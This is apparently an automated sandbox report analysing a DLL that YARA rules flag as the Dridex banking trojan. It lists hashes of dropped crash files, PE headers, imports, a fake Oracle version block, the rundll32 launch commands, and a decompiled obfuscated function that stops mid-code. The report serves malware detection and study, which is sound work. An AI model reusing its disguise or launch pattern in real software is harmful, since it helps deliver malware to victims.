SHA-512:	B81CBFEC1362AA029DFEAF9B3D04DC202339994499172EE442A2903D04BE5892A81DCF10A6E0CA8CA4D67024D92C84FCA8A0911739E05C15942F37B05EA2D822
Malicious:	false
Reputation:	low
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1315340" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..

C:\ProgramData\Microsoft\Windows\WER\Temp\WER2D7E.tmp.dmp Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 15 streams, Mon Dec 27 01:10:08 2021, 0x1205a4 type
Category:	dropped
Size (bytes):	49244
Entropy (8bit):	2.187366768999851
Encrypted:	false
SSDEEP:	192:8mFBVKFykDjVTO5SkbPDjSd85dC8pj1i4IrjwafY2WX6G9:pVZqVK5LbSZ4ow6X+L9
MD5:	565919510DCF1E2D491A5BDDB686121F
SHA1:	C5D7C99E97AA041518FED2C311B7ECF3237133EF
SHA-256:	7D67889CEDB3D3EC11987EADF73D444EB1B5BEE5B87ACE1FAD89076FA65D91BD
SHA-512:	0D4A66CD09D80C259995B9EE984B6BAAA4A9CA71A5391D332ABBEA95B5B23E643473F302BD3B3BC295F4A7CC2D7687006E153D0E3E4A7F7484221491D8E8E2F6
Malicious:	false
Reputation:	low
Preview:	MDMP....... .......p..a........................\|...........$...$ ...........4..........`.......8...........T...........H"..............H ..........4"...................................................................U...........B......."......GenuineIntelW...........T.......D...C..a.............................0..=...............P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.........................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER3937.tmp.WERInternalMetadata.xml Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
Category:	dropped
Size (bytes):	8356
Entropy (8bit):	3.6870291315035373
Encrypted:	false
SSDEEP:	192:Rrl7r3GLNiS46pS6Yds6nJqvgmf8ZSoCpBC89b05sfBcm:RrlsNi16s6YW6Jqvgmf8ZSp0Sfv
MD5:	859BED9C6E07436FD939B72463BE7CCA
SHA1:	138F88D948855E2A684D9CD130A7BE97F42AF875
SHA-256:	F2E71C20D282A5FF795ECFF6C0C20BEA82C41F81DF530C44F8B604053C902704
SHA-512:	20A9AA8BEE6AC54FAD337EF2154C9C18C2132E6A85D0A0C0E7904217D9C8FEA1897AE05EC9BFC0490AB1C88D4DF48DBF9120010F19C0F27A024295A20E2BD55A
Malicious:	false
Reputation:	low
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.9.8.0.<./.P.i.d.>.......

C:\ProgramData\Microsoft\Windows\WER\Temp\WER3D20.tmp.xml Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4731
Entropy (8bit):	4.448631905336673
Encrypted:	false
SSDEEP:	48:cvIwSD8zs57JgtWI9uoWSC8BW8fm8M4JCdssBb7FRW+q8vjssBbWK4SrSvd:uITfrdBSNdJe0KrMKDWvd
MD5:	70B0CB645CDD424A20BC0ECC4B59A809
SHA1:	3BEEB59F251FA2DAE40E0CEA09A3D3C7C313BAF6
SHA-256:	91A98FE70CCC1D03340B7655FA1BD187E3DB44C91E8770ECA3406EBBCD2B14BC
SHA-512:	30129A728870A64EFC23C147A4D594E24FE2339196300F54A40A92EC1760D0151E9E8E015A1C118F432AAA83D68B7DDDDE508A21BCF0F37F45FF273A1248A83C
Malicious:	false
Reputation:	low
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1315340" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..

C:\Windows\appcompat\Programs\Amcache.hve Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	1572864
Entropy (8bit):	4.277973152050362
Encrypted:	false
SSDEEP:	12288:lzyNiIqznPOvc6m2Lf7lSftxbJcllpsjiXXZ6iCECPFZIf+3t8L/Op:dyNiIqznPOvc6mFG
MD5:	56407A9B8524A6A65E767620A1867A26
SHA1:	E2AB171F07520C7526259AFFF69A6EA6A90B7742
SHA-256:	4C0B6475953041CF59DC47D0C9B9933C33D99A63114EA12A01469DD20E295822
SHA-512:	8823C6E7330A13129FD337B6321C451FD55C712A3B0694674C74EA68CDAED143720D08125D35D4E58066D8615D0C37844D5B9FA5D0B8484052CC81956D218244
Malicious:	false
Preview:	regfZ...Z...p.\..,.................. ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e...4............E.4............E.....5............E.rmtm.n.x................................................................................................................................................................................................................................................................................................................................................ '.%........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\appcompat\Programs\Amcache.hve.LOG1 Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	24576
Entropy (8bit):	4.035774861131008
Encrypted:	false
SSDEEP:	384:8GtV5Rftx1XPJ4XUsFcnE7kQPBqXHSeq5QMVyi6+/Wl4Lk4wZd1DoXznFhXvwv1:XtrRftx1/J4XxFcE7NBqXyeq5QMVyi6J
MD5:	55D4D98793A88034731AA2F6ED86AEE3
SHA1:	566B9FF5E06BEF3B0E7B48C2968933D7F2432799
SHA-256:	64630F70BF57D01499D5288678137F282BC38685970216F2B807054AD369E568
SHA-512:	B94479195FFC85532E4688F1235AA3503B451576A1A7C5230BF6BDC156DC9DAAD21D8EF262A777246D618BC8C8962F498968ADB157C5963B776D67CC3B5C6A27
Malicious:	false
Preview:	regfY...Y...p.\..,.................. ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e...4............E.4............E.....5............E.rmtm.n.x................................................................................................................................................................................................................................................................................................................................................&'.%HvLE.^......Y...........c.]..A...\.,............0................... ..hbin................p.\..,..........nk,.B..x.................................... ...........................&...{ad79c032-a2ea-f756-e377-72fb9332c3ae}......nk .B..x........ ........................... .......Z.......................Root........lf......Root....nk .B..x.....................}.............. ...............*...............DeviceCensus.......................vk..................WritePermissionsCheck...

Static File Info

General
File type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.270377398586344
TrID:	Win32 Dynamic Link Library (generic) (1002004/3) 99.60% Generic Win/DOS Executable (2004/3) 0.20% DOS Executable Generic (2002/1) 0.20% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	hMUh2Mkqyi.dll
File size:	536576
MD5:	8337dd22aa86bc357f8bc573441a97c7
SHA1:	6dc2600455a42651c95c3b612406dabd1182bfee
SHA256:	0341b7e0b66e27bee166ba1fd9fad700d85e58a257bbfed1b60a662d97fc1617
SHA512:	6a2572851e1ef774c35bf733455db6450f0c668d907f6617363037cb92277a022878c6fe7e652d035ed08f75f60c4a6463508a5feb7afb9a866c28d13577748c
SSDEEP:	6144:6KMImhktm7mnmvetmzK/kxwv4Zm7mREqZzdazdULd54f3X0kdVtL8faGAPlX:69hXAg5aX0CL8fI
File Content Preview:	MZ......................@...................................P......E;...;...;....Xl.....................2.4.^....uh.{...6.F......Xl.....F.z..............u..........z.......................@...8.{.G...;.......Rich;..........................................

File Icon


Icon Hash:	74f0e4ecccdce0e4

Static PE Info

General
Entrypoint:	0x10005a10
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x10000000
Subsystem:	windows gui
Image File Characteristics:	32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT
Time Stamp:	0x61B705D1 [Mon Dec 13 08:35:29 2021 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	0
File Version Major:	5
File Version Minor:	0
Subsystem Version Major:	5
Subsystem Version Minor:	0
Import Hash:	e9192d34e4c9dcdf739aaa1d74025eb2

Entrypoint Preview

Instruction
mov edx, 00000003h
cmpps xmm1, xmm0, 02h
add eax, 0Ch
add eax, 0Ch
add eax, 0Ch
add eax, 0Ch
add eax, 0Ch
add eax, 0Ch
cmp edx, 03h
je 00007FBC84691B12h
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
push ebp
mov ebp, esp
push edi
push ebx
push esi
and esp, FFFFFFF8h
sub esp, 000000A0h
mov eax, dword ptr [ebp+08h]
mov ecx, 006B34C2h
mov edx, dword ptr [esp+7Ch]
mov dword ptr [esp+7Ch], 3CDA3086h
mov dword ptr [esp+00000094h], 00000000h
mov dword ptr [esp+00000090h], 006C4587h
mov byte ptr [esp+7Ah], FFFFFFBDh
mov dword ptr [esp+74h], 629729F9h
mov byte ptr [esp+65h], FFFFFFF1h
mov dword ptr [esp+38h], 694CC273h
mov esi, dword ptr [esp+00000094h]
mov edi, dword ptr [esp+00000090h]
mov ebx, edi
add ebx, 171E5389h
mov dword ptr [esp+30h], eax
mov eax, esi
adc eax, 00000000h
mov dword ptr [esp+48h], ebx
mov dword ptr [esp+4Ch], eax
mov dword ptr [esp+2Ch], edi
mov dword ptr [esp+28h], ecx
mov dword ptr [esp+24h], edx
mov dword ptr [esp+20h], esi
call 00007FBC84695516h
mov ecx, 4C276534h
mov edx, dword ptr [esp+2Ch]

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x780d0	0x64	.rdata
IMAGE_DIRECTORY_ENTRY_IMPORT	0x781b0	0x17c	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x82000	0x2f0	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x83000	0x1214	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x90f0	0x38	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x9000	0xe8	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x7a16	0x8000	False	0.362518310547	data	4.63110019551	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata	0x9000	0x6fb69	0x70000	False	0.311176845006	data	7.37787775173	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x79000	0x80f4	0x7000	False	0.295828683036	data	6.02916609898	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc	0x82000	0x2f0	0x1000	False	0.090087890625	data	0.784979301457	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x83000	0x1d46	0x2000	False	0.287475585938	data	4.27724948186	IMAGE_SCN_TYPE_COPY, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_VERSION	0x82060	0x290	MS Windows COFF PA-RISC object file	English	United States

Imports

DLL	Import
KERNEL32.dll	CreateFileW, GetProcessVersion, GetModuleFileNameW, CloseHandle, VirtualAllocEx, DeleteTimerQueue, InitAtomTable
msvcrt.dll	wcscoll
SETUPAPI.dll	SetupDiOpenDeviceInterfaceW
WININET.dll	InternetReadFile
RPCRT4.dll	RpcMgmtSetCancelTimeout, NdrGetUserMarshalInfo
LZ32.dll	LZCopy
USER32.dll	BlockInput, TranslateMessage, FillRect, GetWindowTextA, DefMDIChildProcW, GetWindowContextHelpId, IsWinEventHookInstalled, GetClassNameA
NTDSAPI.dll	DsGetDomainControllerInfoW
IPHLPAPI.DLL	GetIpAddrTable
WS2_32.dll	WSACleanup, inet_addr
IMM32.dll	ImmGetCandidateListW
ADVAPI32.dll	CreateRestrictedToken, CryptGenKey, CryptAcquireContextW, RegCloseKey, CryptContextAddRef
GDI32.dll	GetViewportOrgEx, SetWindowOrgEx
pdh.dll	PdhAddCounterW
ole32.dll	CoCreateInstanceEx, CoGetObjectContext, StringFromGUID2
WINMM.dll	waveOutGetPitch
SHLWAPI.dll	AssocGetPerceivedType
ESENT.dll	JetInit

Exports

Name	Ordinal	Address
Wgpomsdeeomtunmdrt	1	0x10078125

Version Infos

Description	Data
OriginalFilename	Hen.dll
FileDescription	Oracle Call Interface
FileVersion	7.0.2.1.0
Legal Copyright	Copyright Oracle Corporation 1979, 2001. All rights reserved.
CompanyName	Oracle Corporation
Translation	0x0409 0x04b0

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

No network behavior found

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: loaddll32.exe PID: 6908 Parent PID: 4700

General

Start time:	17:09:22
Start date:	26/12/2021
Path:	C:\Windows\System32\loaddll32.exe
Wow64 process (32bit):	true
Commandline:	loaddll32.exe "C:\Users\user\Desktop\hMUh2Mkqyi.dll"
Imagebase:	0x290000
File size:	116736 bytes
MD5 hash:	7DEB5DB86C0AC789123DEC286286B938
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Dridex_1, Description: Yara detected Dridex unpacked file, Source: 00000001.00000002.810044742.000000006E9F1000.00000020.00020000.sdmp, Author: Joe Security
Reputation:	moderate

Chronological Activities

Analysis Process: cmd.exe PID: 6940 Parent PID: 6908

General

Start time:	17:09:23
Start date:	26/12/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd.exe /C rundll32.exe "C:\Users\user\Desktop\hMUh2Mkqyi.dll",#1
Imagebase:	0xd80000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 6980 Parent PID: 6908

General

Start time:	17:09:23
Start date:	26/12/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe C:\Users\user\Desktop\hMUh2Mkqyi.dll,Wgpomsdeeomtunmdrt
Imagebase:	0xde0000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Dridex_1, Description: Yara detected Dridex unpacked file, Source: 00000004.00000000.361402259.000000006E9F1000.00000020.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_Dridex_1, Description: Yara detected Dridex unpacked file, Source: 00000004.00000000.364148041.000000006E9F1000.00000020.00020000.sdmp, Author: Joe Security
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 6992 Parent PID: 6940

General

Start time:	17:09:23
Start date:	26/12/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe "C:\Users\user\Desktop\hMUh2Mkqyi.dll",#1
Imagebase:	0xde0000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Dridex_1, Description: Yara detected Dridex unpacked file, Source: 00000005.00000002.380457750.000000006E9F1000.00000020.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_Dridex_1, Description: Yara detected Dridex unpacked file, Source: 00000005.00000000.355576755.000000006E9F1000.00000020.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_Dridex_1, Description: Yara detected Dridex unpacked file, Source: 00000005.00000000.357282433.000000006E9F1000.00000020.00020000.sdmp, Author: Joe Security
Reputation:	high

Chronological Activities

Analysis Process: WerFault.exe PID: 4428 Parent PID: 6992

General

Start time:	17:10:00
Start date:	26/12/2021
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 6992 -s 740
Imagebase:	0x13c0000
File size:	434592 bytes
MD5 hash:	9E2B8ACAD48ECCA55C0230D63623661B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: WerFault.exe PID: 6200 Parent PID: 6980

General

Start time:	17:10:03
Start date:	26/12/2021
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 6980 -s 856
Imagebase:	0x13c0000
File size:	434592 bytes
MD5 hash:	9E2B8ACAD48ECCA55C0230D63623661B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: loaddll32.exe PID: 6908 Parent PID: 4700 loaddll32.exeCOMMON

Executed Functions

Function 6EA00730, Relevance: 5.2, APIs: 3, Instructions: 650
COMMONCrypto

Download Yara Rule

C-Code - Quality: 83%

			E6EA00730(void* __ecx) {
				void* __esi;
				intOrPtr _t155;
				signed char* _t159;
				char _t162;
				void* _t180;
				intOrPtr _t189;
				char _t190;
				intOrPtr _t196;
				intOrPtr _t200;
				void* _t203;
				void* _t212;
				void* _t213;
				void* _t215;
				void* _t216;
				void* _t223;
				void* _t238;
				void* _t241;
				void* _t244;
				void* _t247;
				void* _t250;
				void* _t254;
				void* _t259;
				void* _t265;
				void* _t268;
				int _t271;
				void* _t272;
				void* _t276;
				void* _t277;
				void* _t278;
				void* _t282;
				int _t288;
				intOrPtr* _t291;
				signed char _t294;
				signed char _t295;
				intOrPtr* _t320;
				intOrPtr* _t325;
				intOrPtr* _t363;
				char _t364;
				intOrPtr* _t372;
				void* _t377;
				void* _t382;
				void* _t383;
				void* _t384;
				void* _t385;
				void* _t386;
				void* _t387;
				void* _t393;
				void* _t395;
				void* _t401;
				void* _t403;
				intOrPtr* _t404;
				signed int _t406;
				intOrPtr* _t409;
				void* _t411;
				signed int _t413;
				void* _t414;
				void* _t415;
				void* _t420;
				intOrPtr* _t423;
				void* _t425;
				void** _t427;
				void* _t428;
				void* _t429;

				_t414 = __ecx;
				_t155 =  *0x6ea0d1f8;
				if(_t155 == 0x4c71e88d) {
					_t155 = E6EA0361C(0x30);
					 *0x6ea0d1f8 = _t155;
				}
				if( *((char*)(_t155 + 0xb)) == 0 || _t414 != 0) {
					_t415 = _t428 + 0x48;
					E6EA03698(_t415, 0, 0x11c);
					_t429 = _t428 + 0xc;
					 *((intOrPtr*)(_t429 + 0x48)) = 0x11c;
					if(E6EA0306C(0x8e844d1e, 0xcf311107, 0x8e844d1e, 0x8e844d1e) != 0) {
						_push(_t415);
						asm("int3");
						asm("int3");
					}
					_t404 =  *0x6ea0d1f8;
					_t159 = _t429 + 0x4c;
					_t294 =  *_t159;
					 *(_t404 + 8) = _t294;
					_t295 = _t159[4];
					 *(_t404 + 9) = _t295;
					 *((char*)(_t404 + 0xa)) = _t159[0x110];
					 *((intOrPtr*)(_t404 + 4)) =  *((intOrPtr*)(_t429 + 0x54));
					 *((char*)(_t404 + 0xc)) = 0 | _t159[0x116] != 0x00000001;
					 *_t404 = (_t295 & 0x000000ff) + ((_t294 & 0x000000ff) << 4) - 0x50;
					_t162 = E6EA00FF8(_t404);
					 *(_t429 + 0x198) = 0;
					 *((char*)( *0x6ea0d1f8 + 0xb)) = _t162;
					_t363 = E6EA0306C(0x150c05fc, 0x1da4d409, _t162, _t162);
					if(_t363 == 0) {
						L12:
						_t364 = 0;
						L13:
						 *((char*)( *0x6ea0d1f8 + 0x28)) = _t364;
						if( *((intOrPtr*)(E6EA00730(0))) >= 0x10) {
							_push(6);
							memcpy(_t429 + 0x164, 0x6ea0bce0, 0 << 2);
							_t429 = _t429 + 0xc;
							 *((intOrPtr*)(_t429 + 0x1c)) = 0;
							E6E9FF584(_t429 + 0x24, 0);
							_t406 = 0;
							__eflags = 0;
							do {
								E6E9FF828(_t429 + 0x24, E6E9FF4CC(_t429 + 0x20) + 4);
								 *((intOrPtr*)(E6E9FF4BC(_t429 + 0x24, E6E9FF4CC(_t429 + 0x20) + 0xfffffffc))) =  *((intOrPtr*)(_t429 + 0x164 + _t406 * 4));
								_t406 = _t406 + 1;
								 *((intOrPtr*)(_t429 + 0x1c)) =  *((intOrPtr*)(_t429 + 0x1c)) + 1;
								__eflags = _t406 - 6;
							} while (_t406 < 6);
							_push(0);
							E6EA05580(_t429 + 0xc, _t429 + 0x1c, 0x80000002);
							E6E9FF654(_t429 + 0x20);
							E6EA055B0(_t429 + 8, _t429 + 0x1c0, 0xc0092a94);
							_t180 = E6EA05864(_t429 + 4, __eflags,  *((intOrPtr*)(_t429 + 0x1c0)));
							_t407 = _t180;
							E6E9FDFA4(_t429 + 0x1c0);
							__eflags = _t180;
							if(_t180 != 0) {
								E6EA055B0(_t429 + 8, _t429 + 0x1c8, 0x1e55aaec);
								_t420 = E6EA05864(_t429 + 4, __eflags,  *((intOrPtr*)(_t429 + 0x1c8)));
								E6E9FDFA4(_t429 + 0x1c8);
								_t407 = _t429 + 0x1d0;
								E6EA055B0(_t429 + 8, _t429 + 0x1d0, 0x360d0c74);
								_t401 = E6EA05864(_t429 + 4, __eflags,  *(_t429 + 0x1d0));
								E6E9FDFA4(_t429 + 0x1d0);
								__eflags = _t420;
								if(_t420 != 0) {
									__eflags = _t420 - 5;
									if(_t420 != 5) {
										__eflags = _t420 - 2;
										if(_t420 != 2) {
											L58:
											E6E9FCFDC(_t429 + 0xc);
											__eflags =  *((char*)(_t429 + 8));
											if( *((char*)(_t429 + 8)) == 0) {
												L65:
												_t189 = 0;
												__eflags = 0;
												 *(_t429 + 4) = 0;
												goto L66;
											}
											_t382 =  *(_t429 + 4);
											__eflags = _t382;
											if(_t382 == 0) {
												L61:
												_t238 = 1;
												L63:
												__eflags = _t238;
												if(_t238 == 0) {
													E6EA05558(_t382);
												}
												goto L65;
											}
											__eflags = _t382 - 0xffffffff;
											if(_t382 != 0xffffffff) {
												_t238 = 0;
												__eflags = 0;
												goto L63;
											}
											goto L61;
										}
										__eflags = _t401 - 1;
										if(_t401 != 1) {
											goto L58;
										}
										E6E9FCFDC(_t429 + 0xc);
										__eflags =  *((char*)(_t429 + 8));
										if( *((char*)(_t429 + 8)) == 0) {
											L57:
											 *(_t429 + 4) = 0;
											_t189 = 5;
											goto L66;
										}
										_t383 =  *(_t429 + 4);
										__eflags = _t383;
										if(_t383 == 0) {
											L53:
											_t241 = 1;
											L55:
											__eflags = _t241;
											if(_t241 == 0) {
												E6EA05558(_t383);
											}
											goto L57;
										}
										__eflags = _t383 - 0xffffffff;
										if(_t383 != 0xffffffff) {
											_t241 = 0;
											__eflags = 0;
											goto L55;
										}
										goto L53;
									}
									__eflags = _t401;
									if(_t401 != 0) {
										__eflags = _t401 - 1;
										if(_t401 == 1) {
											E6E9FCFDC(_t429 + 0xc);
											__eflags =  *((char*)(_t429 + 8));
											if( *((char*)(_t429 + 8)) == 0) {
												L121:
												 *(_t429 + 4) = 0;
												_t189 = 4;
												goto L66;
											}
											_t384 =  *(_t429 + 4);
											__eflags = _t384;
											if(_t384 == 0) {
												L117:
												_t244 = 1;
												L119:
												__eflags = _t244;
												if(_t244 == 0) {
													E6EA05558(_t384);
												}
												goto L121;
											}
											__eflags = _t384 - 0xffffffff;
											if(_t384 != 0xffffffff) {
												_t244 = 0;
												__eflags = 0;
												goto L119;
											}
											goto L117;
										}
										goto L58;
									}
									E6E9FCFDC(_t429 + 0xc);
									__eflags =  *((char*)(_t429 + 8));
									if( *((char*)(_t429 + 8)) == 0) {
										L45:
										 *(_t429 + 4) = 0;
										_t189 = 3;
										goto L66;
									}
									_t385 =  *(_t429 + 4);
									__eflags = _t385;
									if(_t385 == 0) {
										L41:
										_t247 = 1;
										L43:
										__eflags = _t247;
										if(_t247 == 0) {
											E6EA05558(_t385);
										}
										goto L45;
									}
									__eflags = _t385 - 0xffffffff;
									if(_t385 != 0xffffffff) {
										_t247 = 0;
										__eflags = 0;
										goto L43;
									}
									goto L41;
								}
								__eflags = _t401;
								if(_t401 != 0) {
									goto L58;
								}
								E6E9FCFDC(_t429 + 0xc);
								__eflags =  *((char*)(_t429 + 8));
								if( *((char*)(_t429 + 8)) == 0) {
									L35:
									 *(_t429 + 4) = 0;
									_t189 = 2;
									goto L66;
								}
								_t386 =  *(_t429 + 4);
								__eflags = _t386;
								if(_t386 == 0) {
									L31:
									_t250 = 1;
									L33:
									__eflags = _t250;
									if(_t250 == 0) {
										E6EA05558(_t386);
									}
									goto L35;
								}
								__eflags = _t386 - 0xffffffff;
								if(_t386 != 0xffffffff) {
									_t250 = 0;
									__eflags = 0;
									goto L33;
								}
								goto L31;
							}
							E6E9FCFDC(_t429 + 0xc);
							__eflags =  *((char*)(_t429 + 8));
							if( *((char*)(_t429 + 8)) == 0) {
								L25:
								 *(_t429 + 4) = 0;
								_t189 = 1;
								goto L66;
							}
							_t387 =  *(_t429 + 4);
							__eflags = _t387;
							if(_t387 == 0) {
								L21:
								_t254 = 1;
								L23:
								__eflags = _t254;
								if(_t254 == 0) {
									E6EA05558(_t387);
								}
								goto L25;
							}
							__eflags = _t387 - 0xffffffff;
							if(_t387 != 0xffffffff) {
								_t254 = 0;
								__eflags = 0;
								goto L23;
							}
							goto L21;
						} else {
							_t189 = 1;
							L66:
							 *((intOrPtr*)( *0x6ea0d1f8 + 0x24)) = _t189;
							_t190 = E6EA01030(0xffffffffffffffff);
